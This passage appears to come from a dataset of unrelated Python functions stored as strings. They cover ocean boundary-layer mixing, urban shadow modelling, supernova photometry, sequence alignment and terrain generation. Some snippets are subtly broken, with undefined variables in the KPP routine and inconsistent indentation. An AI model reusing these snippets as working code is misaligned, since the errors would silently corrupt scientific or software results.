1.)/2. * fltsz[1]) - (fltsz[1]/2.) )\n\n\t\tvectors = rotvec(np.array([col,row]),-asptwist)\n\n\t\tfor i in range(n):\n\t\t\tif verbose>1:\n\t\t\t\tprint_inline('Stamping '+str(asptime[i]))\n\t\t\t\t# FIXME: Clean this mess up a little just for clarity.\n\t \timg += scipy.ndimage.interpolation.shift(scipy.ndimage.interpolation.rotate(hrflat,-asptwist[i],reshape=False,order=0,prefilter=False),[vectors[1,i],vectors[0,i]],order=0,prefilter=False)[hrflat.shape[0]/2.-imsz[0]/2.:hrflat.shape[0]/2.+imsz[0]/2.,hrflat.shape[1]/2.-imsz[1]/2.:hrflat.shape[1]/2+imsz[1]/2.]*dbt.compute_exptime(band,[asptime[i],asptime[i]+1],verbose=verbose,retries=retries)*gxt.compute_flat_scale(asptime[i]+0.5,band,verbose=0)\n\n\treturn img", "def get_hbls_hbbl(self):\n [Ly,N] = self.b.shape\n z_u_w = self.grid_dict['z_u_w']\n z_u_r = self.grid_dict['z_u_r']\n u = self.u\n v = self.v\n \n v_upts = TTTW_func.v2u(v)\n Hz = z_u_w[:,1:] - z_u_w[:,:-1]\n\n\n\n # CALCULATE swr_frac\n self.swr_frac = TTTW_func.lmd_swr_frac(self.grid_dict)\n\n\n # WHOLE THING HAPPENS IN j loop through y-indices\n \n # INITIALIZE ARRAYS\n self.kmo = np.zeros([Ly])\n self.Cr = np.zeros([Ly])\n self.kbl = np.empty([Ly],dtype='int')\n self.C_h_MO = np.zeros([Ly])\n self.Cr = np.zeros([Ly,N+1]) # sum term\n self.FC = np.zeros([Ly,N+1])\n self.swdk_r = np.zeros([Ly,N+1])\n \n self.zscale = np.zeros([Ly,N])\n self.Kern = np.zeros([Ly,N])\n\n \n # --> LOOP THROUGH Y-INDICES\n for j in range(Ly):\n if self.LIMIT_MO_DEPTH:\n self.kmo[j] = 0\n self.C_h_MO[j] = self.C_MO *self.ustar[j]**3/self.vonKar\n \n self.kbl[j] = 0\n self.Cr[j,-1] = 0 # set top Cr\n self.Cr[j,0] = 0 # set bottom Cr\n \n # SEARCH FOR MIXED LAYER DEPTH\n self.FC[j,-1] = 0.\n\n\n # ---> LOOP TOP TO BOTTOM (FORTRAN ==> k=N-1,1,-1)\n for k in range(N-1,0,-1):\n # INDEX MAP\n k_r = k-1\n k_w = k\n\n \n zscale = z_u_w[j,N] - z_u_r[j,k_r]\n self.zscale[j,k_w] = zscale\n if self.LMD_KPP:\n if self.LMD_BKPP:\n zscaleb = z_u_r[j,k_r] - z_u_w[j,0]\n Kern = zscale * zscaleb**2 / ( (zscale + self.epssfcs*self.hbls_old[j]) * (zscaleb**2+(self.epssfcb**2*self.hbbl_old[j]**2)))\n else:\n Kern = zscale / (zscale + 
(self.epssfcs*self.hbls_old[j]))\n else:\n Kern = 1.\n \n\n\n self.Kern[j,k_w] = Kern\n self.FC[j,k_w] = self.FC[j,k_w+1] + Kern * (\\\n ( ( u[j,k_r+1] - u[j,k_r] )**2 + ( v_upts[j,k_r+1] - v_upts[j,k_r])**2 ) \\\n / (Hz[j,k_r] + Hz[j,k_r+1]) \\\n - 0.5 * ( Hz[j,k_r] + Hz[j,k_r+1]) * (self.Ri_inv * self.bvf[j,k_w] + self.C_Ek*self.f[j]*self.f[j]))\n\n\n #\t\tLOOP THAT FINDS BL DEPTH ##\n #----> LOOP TOP TO BOTTOM (start at free surface, w-level surface) \n \n if self.LMD_KPP:\n #swdk_r only used in this function so don't need to be class attribute\n # but for testing make it an attribute to see what it is\n \n # fortran equivlanet ===> k=N,1,-1 \n for k in range(N,0,-1):\n # INDEX MAP\n k_r = k-1\n k_w = k\n\n ###################################################################### \n self.swdk_r[j,k_w] = np.sqrt( self.swr_frac[j,k_w] * self.swr_frac[j,k_w-1])\n zscale = z_u_w[j,N] - z_u_r[j,k_r]\n Bfsfc = self.Bo[j] + self.Bosol[j] * (1-self.swdk_r[j,k_w])\n \n self.bvf_max = np.sqrt(np.max([0,self.bvf[j,k_w-1]]))\n \n # CALCULATE TURBULENT VELOCITY SCALE FOR TRACERS\n \t\t\t self.ws = self.lmd_wscale_ws_only(Bfsfc, zscale,self.hbls_old[j],self.ustar[j])\n \n self.Vtsq = self.Vtc * self.ws* self.bvf_max + self.V0\n \n\n self.Cr[j,k_w] = self.FC[j,k_w] + self.Vtsq\n \n\n #######################################################################\n \n # SEARCH FOR hbls vertical level #\n '''\n kbl is specified at vertical w-level (via Cr which is at\n vertical w-levels)\n '''\n if self.kbl[j] == 0 and self.Cr[j,k_w] < 0:\n self.kbl[j] = k_w\n if self.LIMIT_MO_DEPTH:\n if self.kmo[j] == 0 and Bfsfc*(z_u_w[j,N] - z_u_r[j,k_r]) > self.C_h_MO[j]:\n self.kmo[j] = k_w\n\n \n #--> still in j-loop\n #######################################################\n \n # \t\tGET SURFACE BOUNDARY LAYER DEPTH # \n self.hbls[j] = z_u_w[j,N] - z_u_w[j,0] + self.eps # set hbls as depth of entire water column\n if self.kbl[j] > 0:\n k_w = self.kbl[j]\n k_r = k_w - 1 \n if k_w == N: # set hbls at the surface btwn w- and rho-levels at surface\n self.hbls[j] = z_u_w[j,N] - z_u_r[j,N-1]\n \n else:\n self.hbls[j] = z_u_w[j,N] - ( z_u_r[j,k_r] * self.Cr[j,k_w+1] - z_u_r[j,k_r+1] * self.Cr[j,k_w]) / \\\n (self.Cr[j,k_w+1] - self.Cr[j,k_w])\n \n if self.LIMIT_MO_DEPTH:\n if self.kmo[j] > 0:\n k_w = self.kmo[j]\n k_r = k_w-1\n if k_w == N:\n z_up = z_u_w[j,N]\n cff_up = np.max([0,Bo[j]])\n else:\n z_up = z_r[j,k_w+1]\n cff_up = np.max([0, Bo[j] + self.Bosol[j]*(1-self.swdk_r[j,(k_w-1)+1])])\n \n cff_dn = np.max([0,Bo[j] + self.Bosol[j] * (1-self.swdk_r[j,k_w])]) \n h_MO = z_u_w[j,N] + self.C_h_MO[j] * ( cff_up*z_up - cff_dn * z_u_r[j,k_r] ) \\\n / ( cff_up * cff_dn * (z_up - z_u_r[j,k_r]) ) \\\n + self.C_h_MO[j] * (cff_dn - cff_up)\n\n self.hbls[j] = np.min([self.hbls[j],np.max([h_MO,0])])\n\n\n\n #### GET BOTTOM BOUNDARY LAYER DEPTH #######\n if self.LMD_BKPP:\n self.kbl[j] = 0 # reset Cr at bottom and kbl for BKPP\n self.Cr[j,0] = 0.\n self.FC[j,0] = 1.5 * self.FC[j,1] - 0.5 * self.FC[j,2] # linear extrapolation\n \n #---> LOOP BOTTOM TO TOP\n # FIND kbl for BBL\n for k in range(1,N+1):\n k_r = k-1\n k_w = k \n self.Cr[j,k_w] = self.FC[j,k_w] - self.FC[j,0]\n \n # LOOK FOR FIRST ZERO CROSSING FROM BOTTOM UP\n if self.kbl[j] == 0 and self.Cr[j,k_w] > 0:\n self.kbl[j] = k_w \n \n\n self.hbbl[j] = z_u_w[j,N] - z_u_w[j,0] # total depth\n if self.kbl[j] > 0 :\n k_w = self.kbl[j] \n k_r = k_w -1\n if k_w == 1: # NO BBL CASE\n self.hbbl[j] = z_u_r[j,0] - z_u_w[j,0] #in between bottom rho and w-level\n else:\n self.hbbl[j] = ( 
z_u_r[j,k_r-1] * self.Cr[j,k_w] - z_u_r[j,k_r] * self.Cr[j,k_w-1]) / \\\n (self.Cr[j,k_w] - self.Cr[j,k_w-1]) - z_u_w[j,0]", "def grow_stack_arm(top):\n if top is not None and top.name in ['sandwichtop', 'sandwichtop_no_label']:\n _bot = find_sandwich_bottom(top)\n if _bot is None:\n return\n if top.ey > 0:\n top.reset_y()\n _ty = top.spr.get_xy()[1]\n _th = top.spr.get_dimensions()[1]\n _by = _bot.spr.get_xy()[1]\n _dy = _by - (_ty + _th)\n if _dy > 0:\n top.expand_in_y(_dy / top.scale)\n top.refresh()", "def shadowingfunction_wallheight_23(a, vegdem, vegdem2, azimuth, altitude, scale, amaxvalue, bush, walls, aspect):\n\n if not walls.size:\n \"\"\" needs to be checked\n walls=ordfilt2(a,4,[0 1 0; 1 0 1; 0 1 0]);\n walls=walls-a;\n walls(walls<3)=0;\n sizex=size(a,1);%might be wrong\n sizey=size(a,2);\n dirwalls = filter1Goodwin_as_aspect_v3(walls,sizex,sizey,scale,a);\n aspect=dirwalls*pi/180;\n \"\"\"\n\n # conversion\n degrees = np.pi/180\n azimuth *= degrees\n altitude *= degrees\n \n # measure the size of the image\n\n sizex = np.shape(a)[0]\n sizey = np.shape(a)[1]\n \n # initialise parameters\n dx = 0\n dy = 0\n dz = 0\n \n sh = np.zeros((sizex, sizey))\n vbshvegsh = np.copy(sh)\n vegsh = np.copy(sh)\n f = np.copy(a)\n shvoveg = np.copy(vegdem) # for vegetation shadowvolume\n g = np.copy(sh)\n bushplant = bush > 1\n #wallbol = np.array([np.float(boolean) for row in walls > 0 for boolean in row])\n # wallbol = np.copy(sh)\n # wallbol[walls > 0] = 1.\n wallbol = (walls > 0).astype(float)\n wallbol[wallbol == 0] = np.nan\n\n pibyfour = np.pi/4\n threetimespibyfour = 3*pibyfour\n fivetimespibyfour = 5*pibyfour\n seventimespibyfour = 7*pibyfour\n sinazimuth = np.sin(azimuth)\n cosazimuth = np.cos(azimuth)\n tanazimuth = np.tan(azimuth)\n signsinazimuth = np.sign(sinazimuth)\n signcosazimuth = np.sign(cosazimuth)\n dssin = np.abs(1/sinazimuth)\n dscos = np.abs(1/cosazimuth)\n tanaltitudebyscale = np.tan(altitude)/scale\n\n tempvegdem = np.zeros((sizex, sizey))\n tempvegdem2 = np.zeros((sizex, sizey))\n temp = np.zeros((sizex, sizey))\n\n index = 0\n\n # main loop\n while (amaxvalue>=dz) and (np.abs(dx)<sizex) and (np.abs(dy)<sizey):\n if ((pibyfour <= azimuth) and (azimuth < threetimespibyfour)) or \\\n ((fivetimespibyfour <= azimuth) and (azimuth < seventimespibyfour)):\n dy = signsinazimuth*(index+1)\n dx = -1*signcosazimuth*np.abs(np.round((index+1)/tanazimuth))\n ds = dssin\n else:\n dy = signsinazimuth*np.abs(np.round((index+1)*tanazimuth))\n dx = -1*signcosazimuth*(index+1)\n ds = dscos\n\n # note: dx and dy represent absolute values while ds is an incremental value\n dz = ds*(index+1)*tanaltitudebyscale\n tempvegdem[0:sizex, 0:sizey] = 0\n tempvegdem2[0:sizex, 0:sizey] = 0\n temp[0:sizex, 0:sizey] = 0\n \n absdx = np.abs(dx)\n absdy = np.abs(dy)\n\n xc1 = int((dx+absdx)/2)\n xc2 = int(sizex+(dx-absdx)/2)\n yc1 = int((dy+absdy)/2)\n yc2 = int(sizey+(dy-absdy)/2)\n\n xp1 = -int((dx-absdx)/2)\n xp2 = int(sizex-(dx+absdx)/2)\n yp1 = -int((dy-absdy)/2)\n yp2 = int(sizey-(dy+absdy)/2)\n\n tempvegdem[int(xp1):int(xp2), int(yp1):int(yp2)] = vegdem[int(xc1):int(xc2), int(yc1):int(yc2)] - dz\n tempvegdem2[int(xp1):int(xp2), int(yp1):int(yp2)] = vegdem2[int(xc1):int(xc2), int(yc1):int(yc2)] - dz\n temp[int(xp1):int(xp2), int(yp1):int(yp2)] = a[int(xc1):int(xc2), int(yc1):int(yc2)] - dz\n\n f = np.max([f, temp], axis=0)\n #f = np.array([np.max(val) for val in zip(f, temp)])\n shvoveg = np.max([shvoveg, tempvegdem], axis=0)\n sh[f > a] = 1\n sh[f <= a] = 0 #Moving building shadow\n fabovea = 
(tempvegdem > a).astype(int) #vegdem above DEM\n gabovea = (tempvegdem2 > a).astype(int) #vegdem2 above DEM\n vegsh2 = fabovea - gabovea\n vegsh = np.max([vegsh, vegsh2], axis=0)\n vegsh[vegsh*sh > 0] = 0 # removing shadows 'behind' buildings\n vbshvegsh = np.copy(vegsh) + vbshvegsh\n\n # vegsh at high sun altitudes\n if index == 0:\n firstvegdem = np.copy(tempvegdem) - np.copy(temp)\n firstvegdem[firstvegdem <= 0] = 1000\n vegsh[firstvegdem < dz] = 1\n vegsh *= (vegdem2 > a)\n vbshvegsh = np.zeros((sizex, sizey))\n\n # Bush shadow on bush plant\n if np.max(bush) > 0 and np.max(fabovea*bush) > 0:\n tempbush = np.zeros((sizex, sizey))\n tempbush[int(xp1):int(xp2), int(yp1):int(yp2)] = bush[int(xc1):int(xc2), int(yc1):int(yc2)] - dz\n g = np.max([g, tempbush], axis=0)\n g = bushplant * g\n \n # if index<3 #removing shadowed walls 1\n # tempfirst(1:sizex,1:sizey)=0;\n # tempfirst(xp1:xp2,yp1:yp2)= a(xc1:xc2,yc1:yc2);\n # if index==1 # removing shadowed walls 2\n # tempwalls(1:sizex,1:sizey)=0;\n # tempwalls(xp1:xp2,yp1:yp2)= wallbol(xc1:xc2,yc1:yc2);\n # wallfirst=((tempwalls+wallbol).*wallbol)==2;\n # wallfirstaspect=aspect.*wallbol.*wallfirst;\n # wallfirstaspect(wallfirstaspect==0)=NaN;\n # wallfirstsun=(wallfirstaspect>azimuth-pi/2 & wallfirstaspect<azimuth+pi/2);\n # wallfirstshade=wallfirst-wallfirstsun;\n # end\n # end\n \n index += 1\n # imagesc(h),axis image,colorbar\n # Stopping loop if all shadows reached the ground\n # stopbuild=stopbuild==f;\n # imagesc(stopbuild),axis image,pause(0.3)\n # fin=find(stopbuild==0, 1);\n # stopbuild=f;\n # stopveg=stopveg==vegsh;\n # finveg=find(stopveg==0, 1);\n # stopveg=vegsh;\n # if isempty(fin) && isempty(finveg)\n # dz=amaxvalue+9999;\n # end\n\n # Removing walls in shadow due to selfshadowing\n azilow = azimuth - np.pi/2\n azihigh = azimuth + np.pi/2\n if azilow >= 0 and azihigh < 2*np.pi: # 90 to 270 (SHADOW)\n facesh = np.logical_or(aspect < azilow, aspect >= azihigh).astype(float) - wallbol + 1 # TODO check\n elif azilow < 0 and azihigh <= 2*np.pi: # 0 to 90\n azilow = azilow + 2*np.pi\n facesh = np.logical_or(aspect > azilow, aspect <= azihigh) * -1 + 1 # (SHADOW)\n elif azilow > 0 and azihigh >= 2*np.pi: # 270 to 360\n azihigh -= 2 * np.pi\n facesh = np.logical_or(aspect > azilow, aspect <= azihigh)*-1 + 1 # (SHADOW)\n\n sh = 1-sh\n vbshvegsh[vbshvegsh > 0] = 1\n vbshvegsh = vbshvegsh-vegsh\n \n if np.max(bush) > 0:\n g = g-bush\n g[g > 0] = 1\n g[g < 0] = 0\n vegsh = vegsh-bushplant+g\n vegsh[vegsh < 0] = 0\n\n vegsh[vegsh > 0] = 1\n shvoveg = (shvoveg-a) * vegsh #Vegetation shadow volume\n vegsh = 1-vegsh\n vbshvegsh = 1-vbshvegsh\n\n #removing walls in shadow\n # tempfirst=tempfirst-a;\n # tempfirst(tempfirst<2)=1;\n # tempfirst(tempfirst>=2)=0;\n \n shvo = f - a # building shadow volume\n\n facesun = np.logical_and(facesh + (walls > 0).astype(float) == 1, walls > 0).astype(float)\n #facesun = np.reshape(np.array([np.float(boolean) for row in facesun for boolean in row]), facesun.shape)\n\n wallsun = np.copy(walls-shvo)\n wallsun[wallsun < 0] = 0\n wallsun[facesh == 1] = 0 # Removing walls in \"self\"-shadow\n # wallsun(tempfirst = = 0) = 0# Removing walls in shadow 1\n # wallsun(wallfirstshade = = 1) = 0# Removing walls in shadow 2\n wallsh = np.copy(walls-wallsun)\n # wallsh(wallfirstshade = = 1) = 0\n # wallsh = wallsh+(wallfirstshade.*walls)\n #wallbol = np.reshape(np.array([np.float(boolean) for row in walls > 0 for boolean in row]), walls.shape)\n wallbol = (walls > 0).astype(float)\n\n wallshve = shvoveg * wallbol\n wallshve = 
wallshve - wallsh\n wallshve[wallshve < 0] = 0\n id = np.where(wallshve > walls)\n wallshve[id] = walls[id]\n wallsun = wallsun-wallshve # problem with wallshve only\n id = np.where(wallsun < 0)\n wallshve[id] = 0\n wallsun[id] = 0\n \n # subplot(2,2,1),imagesc(facesh),axis image ,colorbar,title('facesh')#\n # subplot(2,2,2),imagesc(wallsun,[0 20]),axis image, colorbar,title('Wallsun')#\n # subplot(2,2,3),imagesc(sh-vegsh*0.8), colorbar,axis image,title('Groundsh')#\n # subplot(2, 2, 4), imagesc(wallshve, [0 20]), axis image, colorbar, title('Wallshve')#\n return vegsh, sh, vbshvegsh, wallsh, wallsun, wallshve, facesh, facesun", "def rigid_rings(self):\n raise NotImplementedError", "def compose_lwss_gun (glider_gun, A = -1, B = -1, C = -1):\n if (A < 0): A = 40\n if (B < 0): B = A;\n if (C < 0): C = A;\n\n m = min (A, B, C)\n a = A - m\n b = B - m\n c = C - m\n return \\\n glider_gun[4 * a] ( A, -A - 3, flip_x) + \\\n glider_gun[4 * b] (-B + 2, -B + 1) + \\\n glider_gun[4 * c + 1] (-C + 6, C, flip_y)", "def sharpen_bands(self):\n for label in self.labels:\n self.sharp_bands[label] = self.bands[label] - self.gauss_bands[\n label]", "def __bcc_left_diagonals(self) -> cq.cq.Workplane:\n # In a cuboid ABCDA1B1C1D1 this is the angle C1AD\n #angle_C1AD = 90 - degrees(acos(2**-.5))\n angle_C1AD = 90 - degrees(acos(0.5))\n angle_CAD = 90 - degrees(acos(sqrt(2/3)))\n pseudo_unit_cell_size = sqrt(2/3)*self.unit_cell_size\n corner_points = np.array(\n [(0, 0),\n (self.bcc_unit_cell_size, 0),\n (self.bcc_unit_cell_size, self.unit_cell_size),\n (0, self.unit_cell_size)]\n )\n result = (\n cq.Workplane(\"XY\")\n .pushPoints(corner_points)\n .eachpointAdaptive(\n create_bcc_diagonal_strut,\n callback_extra_args = [\n {\"unit_cell_size\": pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": - angle_CAD,\n \"angle_y\": angle_C1AD},\n {\"unit_cell_size\": 0.5 * pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": - angle_CAD,\n \"angle_y\": - angle_C1AD},\n {\"unit_cell_size\": 0.5 * pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": angle_CAD,\n \"angle_y\": - angle_C1AD},\n {\"unit_cell_size\": pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": angle_CAD,\n \"angle_y\": angle_C1AD}\n ],\n useLocalCoords = True\n )\n )\n return result", "def diagonalizing_gates(self):\n raise NotImplementedError", "def get_sn2005ek(colorplt=False):\n z = 0.016551\n ebv = 0.210\n D = cosmo.luminosity_distance([z])[0].value * 1e+6 # in pc\n dis_mod = 5*np.log10(D / 10)\n t_max = 53639.9\n print (\"adopt r band t_max from Drout+13\")\n \n # tb = pd.read_csv('/Users/yuhanyao/Desktop/ZTF18abfcmjw/data/Drout2013/table1', sep='\\t')\n # tb = tb.drop(columns=[\"Unnamed: 6\"])\n \n mjds = np.array([53639.3, 53640.3, 53641.3, 53642.2, 53643.2, 53645.3,\n 53646.5, 53648.0, 53649.2, 53650.4, 53651.3, 53652.5,\n 53654.2, 53655.2, 53656.2, 53657.2])\n \n Bmags = np.array([18.25, 18.38, 18.65, np.nan, 19.10, 19.71,\n 20.07, np.nan, 20.67, 20.90, 21.05, np.nan,\n 21.74, np.nan, np.nan, np.nan])\n \n Bmag_uncs = np.array([0.02, 0.03, 0.02, np.nan, 0.05, 0.07, \n 0.07, np.nan, 0.04, 0.04, 0.04, np.nan,\n 0.12, np.nan, np.nan, np.nan])\n \n Vmags = np.array([17.83, 18.03, 17.92, np.nan, 18.24, 18.66,\n 18.93, 19.48, 19.63, 19.86, 19.98, 20.35,\n 20.60, 20.74, 20.88, 21.22])\n \n Vmag_uncs = np.array([0.02, 0.03, 0.01, np.nan, 0.02, 0.02,\n 0.02, 0.06, 0.03, 0.03, 0.04, 0.05, \n 0.08, 0.10, 0.08, 0.13])\n \n Rmags = np.array([17.46, 17.41, 17.60, 17.69, 17.86, 18.18, 
\n np.nan, 18.83, 19.03, 19.26, 19.48, 19.75,\n 20.08, np.nan, 20.47, np.nan])\n \n Rmag_uncs = np.array([0.01, 0.02, 0.01, 0.02, 0.01, 0.01,\n np.nan, 0.03, 0.02, 0.02, 0.02, 0.04,\n 0.05, np.nan, 0.08, np.nan])\n\n Imags = np.array([17.20, 17.13, 17.18, np.nan, 17.47, 17.71, \n np.nan, 18.13, 18.26, 18.51, 18.61, 18.74, \n 19.01, np.nan, 19.47, np.nan])\n \n Imag_uncs = np.array([0.02, 0.04, 0.02, np.nan, 0.03, 0.02,\n np.nan, 0.06, 0.02, 0.02, 0.02, 0.03,\n 0.05, np.nan, 0.06, np.nan])\n \n mymjds = np.hstack([mjds, mjds, mjds, mjds])\n mymags = np.hstack([Bmags, Vmags, Rmags, Imags])\n myemags = np.hstack([Bmag_uncs, Vmag_uncs, Rmag_uncs, Imag_uncs])\n myfilts = np.hstack([ np.repeat(\"B\", len(Bmags)),\n np.repeat(\"V\", len(Bmags)),\n np.repeat(\"R\", len(Rmags)),\n np.repeat(\"I\", len(Imags)) ])\n ix = ~np.isnan(mymags)\n tb = pd.DataFrame({'mjd': mymjds[ix],\n 'mag': mymags[ix],\n 'emag': myemags[ix],\n \"filter\": myfilts[ix]})\n \n ixB = tb['filter'].values==\"B\"\n ixV = tb['filter'].values==\"V\"\n ixR = tb['filter'].values==\"R\"\n ixI = tb['filter'].values==\"I\"\n \n tb['wave'] = np.zeros(len(tb))\n tb['wave'].values[ixB] = 4359\n tb['wave'].values[ixV] = 5430\n tb['wave'].values[ixR] = 6349\n tb['wave'].values[ixI] = 8797\n \n tb['mag0'] = tb['mag'] - extinction.ccm89(tb['wave'].values, 3.1*ebv, 3.1)\n tb['mag0_abs'] = tb['mag0'] - dis_mod\n tb['tmax_rf'] = (tb['mjd'] - t_max) / (1+z)\n if colorplt==False:\n return tb\n else:\n tb = add_datecol(tb)\n ix = np.in1d(tb[\"filter\"].values, np.array(['B', 'R', 'I']))\n tb = tb[ix]\n\n dates = get_date_span(tb)\n datesave = []\n for i in range(len(dates)):\n x = dates[i]\n ix = tb[\"date\"].values == x\n tbsub = tb[ix]\n if len(tbsub)!=0:\n flts = tbsub['filter'].values\n if \"R\" in flts and np.sum(np.unique(flts))!=1:\n datesave.append(x)\n datesave = np.array(datesave)\n \n mcolor = []\n mcolor_unc = []\n mjds = []\n colorname = []\n for i in range(len(datesave)):\n x = datesave[i]\n ix = tb[\"date\"].values == x\n tbsub = tb[ix]\n gtb = tbsub[tbsub[\"filter\"].values==\"B\"]\n rtb = tbsub[tbsub[\"filter\"].values==\"R\"]\n itb = tbsub[tbsub[\"filter\"].values==\"I\"]\n if len(gtb)!=0:\n gmjds = gtb[\"mjd\"].values\n gmags = gtb[\"mag0\"].values\n gemags = gtb[\"emag\"].values\n gwtgs = 1/gemags**2\n gmag = np.sum(gmags * gwtgs) / np.sum(gwtgs)\n gmjd = np.sum(gmjds * gwtgs) / np.sum(gwtgs)\n gemag = 1/ np.sqrt(np.sum(gwtgs))\n if len(rtb)!=0:\n rmjds = rtb[\"mjd\"].values\n rmags = rtb[\"mag0\"].values\n remags = rtb[\"emag\"].values\n rwtgs = 1/remags**2\n rmag = np.sum(rmags * rwtgs) / np.sum(rwtgs)\n rmjd = np.sum(rmjds * rwtgs) / np.sum(rwtgs)\n remag = 1/ np.sqrt(np.sum(rwtgs))\n if len(itb)!=0:\n imjds = itb[\"mjd\"].values\n imags = itb[\"mag0\"].values\n iemags = itb[\"emag\"].values\n iwtgs = 1/iemags**2\n imag = np.sum(imags * iwtgs) / np.sum(iwtgs)\n imjd = np.sum(imjds * iwtgs) / np.sum(iwtgs)\n iemag = 1/ np.sqrt(np.sum(iwtgs))\n if len(gtb)!=0 and len(rtb)!=0:\n mcolor.append(gmag - rmag)\n mjds.append( 0.5 * (gmjd + rmjd) )\n mcolor_unc.append( np.sqrt(gemag**2 + remag**2) )\n colorname.append(\"BmR\")\n if len(rtb)!=0 and len(itb)!=0:\n mcolor.append(rmag - imag)\n mjds.append( 0.5 * (rmjd + imjd) )\n mcolor_unc.append( np.sqrt(remag**2 + iemag**2) )\n colorname.append(\"RmI\")\n \n ctb = Table(data = [mjds, mcolor, mcolor_unc, colorname],\n names = [\"mjd\", \"c\", \"ec\", \"cname\"])\n \n ctb['tmax_rf'] = (ctb['mjd'] - t_max) / (1+z)\n ctb = ctb.to_pandas()\n return ctb", "def fibre_strain_energy(self, 
l_stretch):\n if l_stretch <= 1.0:\n # compressed region - no energy\n return 0.0\n\n # Note: this range should be '< lm' according to FEBio but we use '<=' to\n # make setting c6 easier -> there's no difference because it's cts.\n if l_stretch <= self.lm:\n # exponential energy\n return self.c3 * (exp(self.c4 * (l_stretch - 1.0)) - 1.0)\n\n # linear energy\n return self.c5 * l_stretch + self.c6", "def fill_matrix(self):\n\n print(\"Creating Needleman-Wunsch matrix..\")\n\n for i in range(self.matrix.shape[0]):\n for j in range(self.matrix.shape[1]):\n\n if i < len(self.seq_2) and j < len(self.seq_1):\n self.matrix[0, i + 2] = self.seq_2[i]\n self.matrix[j + 2, 0] = self.seq_1[j]\n\n if i > 1 and j > 1:\n self.matrix[1, j] = self.matrix[1, j - 1] + self.GAP\n self.matrix[i, 1] = self.matrix[i - 1, 1] + self.GAP\n\n diag = (self.matrix[i - 1, j - 1] + self.compare(self.matrix[0, j], self.matrix[i, 0]))\n up = (self.matrix[i, j - 1] + self.GAP)\n left = (self.matrix[i - 1, j] + self.GAP)\n\n selected = max(diag, up, left)\n\n self.add_arrow(i, j, diag, up, left, selected)\n\n self.matrix[i, j] = selected", "def quartz():\n\n rho = 2649.\n\n C = np.zeros((6,6), dtype=float)\n C[0,0] = 86.9; C[0,1] = 7.6; C[0,2] = 12.; C[0,3] = 17.8; C[0,4] = 0.; C[0,5] = 0.\n C[1,0] = C[0,1]; C[1,1] = 86.9; C[1,2] = 12.; C[1,3] = -17.8; C[1,4] = 0.; C[1,5] = 0.\n C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 106.4; C[2,3] = 0.; C[2,4] = 0.; C[2,5] = 0.\n C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 59.5; C[3,4] = 0.; C[3,5] = 0.\n C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 59.5; C[4,5] = -17.8\n C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 39.6\n\n return C, rho", "def generate_pre_heights(self):\n\n config = self.config\n\n def get_lands_oceans():\n oceans, lands = [], []\n for x in xrange(self.size):\n for y in xrange(self.size):\n coord = x, y\n if self[coord] <= 0:\n oceans.append(coord)\n else:\n lands.append(coord)\n return lands, oceans\n\n def add_heights():\n \"\"\"Add pre heights for diamond-square\n \"\"\"\n fac_min = 50\n fac_max = 40\n\n print 'Get lands and oceans'\n t = time.time()\n lands, oceans = get_lands_oceans()\n print 'lands and oceans getted: ', time.time() - t\n\n # TODO: create one def with params: mount_level and other for create heights\n # add default heights\n for coord in lands:\n self[coord] = self.config.land_mount_level[1]\n\n for coord in oceans:\n self[coord] = -self.config.mid_mount_level[1]\n\n # add low heights for lands\n count_land = int(round(len(lands) * config.factor_low_mount / 100.))\n land_coords = []\n\n starts = random.randint(count_land / fac_min, count_land / fac_max)\n for start in xrange(starts):\n start_coord = lands[random.randint(0, len(lands)-1)]\n land_coords.append(start_coord)\n self[start_coord] = random.randint(self.config.low_mount_level[0], self.config.low_mount_level[1])\n\n while count_land > 0:\n # for lands\n if count_land > 0:\n dx = random.randint(-1,1)\n dy = random.randint(-1,1)\n coord = land_coords[random.randint(0, len(land_coords) - 1)]\n coord = coord[0] + dx, coord[1] + dy\n if coord not in land_coords:\n self[coord] = random.randint(self.config.low_mount_level[0], self.config.low_mount_level[1])\n land_coords.append(coord)\n count_land -= 1\n\n\n target_lands = land_coords\n\n # -------------------------------------------------------------------------------\n # add mid heights for lands\n count_land = int(round(len(target_lands) * 
(config.factor_mid_mount / 100.)))\n land_coords = []\n\n starts = random.randint(count_land / (fac_min * 3), count_land / (fac_max*3))\n for start in xrange(starts):\n start_coord = target_lands[random.randint(0, len(target_lands)-1)]\n land_coords.append(start_coord)\n self[start_coord] = random.randint(self.config.mid_mount_level[0],\n self.config.mid_mount_level[1])\n\n if land_coords == []:\n return\n\n while count_land > 0:\n # for lands\n if count_land > 0:\n dx = random.randint(-1,1)\n dy = random.randint(-1,1)\n coord = land_coords[random.randint(0, len(land_coords) - 1)]\n coord = coord[0] + dx, coord[1] + dy\n #if coord not in land_coords:\n self[coord] = random.randint(self.config.mid_mount_level[0],\n self.config.mid_mount_level[1])\n land_coords.append(coord)\n count_land -= 1\n\n\n target_lands = land_coords\n\n\n # -------------------------------------------------------------------------------\n # add high heights for lands\n count_land = int(round(len(target_lands) * (config.factor_high_mount / 100.)))\n land_coords = []\n\n starts = random.randint(count_land / (fac_min * 4), count_land / (fac_max * 3))\n for start in xrange(starts):\n start_coord = target_lands[random.randint(0, len(target_lands)-1)]\n land_coords.append(start_coord)\n self[start_coord] = random.randint(self.config.high_mount_level[0],\n self.config.high_mount_level[1])\n\n while count_land > 0:\n # for lands\n if count_land > 0:\n dx = random.randint(-1,1)\n dy = random.randint(-1,1)\n try:\n coord = land_coords[random.randint(0, len(land_coords) - 1)]\n except ValueError:\n coord = lands[random.randint(0, len(lands) - 1)]\n coord = coord[0] + dx, coord[1] + dy\n #if coord not in land_coords:\n self[coord] = random.randint(self.config.high_mount_level[0],\n self.config.high_mount_level[1])\n land_coords.append(coord)\n count_land -= 1\n\n\n\n\n def square_diamond(sx, sy, size, strong):\n \"\"\"Algorithm Square-diamond generate terrain heights\n\n -> http://www.lighthouse3d.com/opengl/terrain/index.php?mpd2\n \"\"\"\n if size == 1:\n 